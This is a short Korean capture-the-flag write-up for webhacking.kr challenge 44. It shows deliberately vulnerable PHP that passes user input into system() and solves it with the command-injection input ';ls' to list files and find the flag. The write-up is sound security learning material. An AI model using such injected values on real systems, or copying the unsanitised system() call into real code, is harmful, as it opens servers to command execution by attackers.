[webhacking.kr] 44번 문제 풀이[Command Injection]

💡 Webhacking.kr challenge(old) 44번 문제에 대한 풀이입니다.

문제

<?php
  if($_POST['id']){
    $id = $_POST['id'];
    $id = substr($id,0,5);
    system("echo 'hello! {$id}'"); // You just need to execute ls
  }
?>

문제 풀이

다음과 같이 입력해줍니다.

  ';ls'

를 입력하면 system 함수는 다음과같이 실행되어 bash에서 ls 명령어가 실행됩니다.

echo 'hello! ';ls''

flag 파일의 경로가 나왔으니 해당 파일을 접근해보면 플래그가 나옵니다.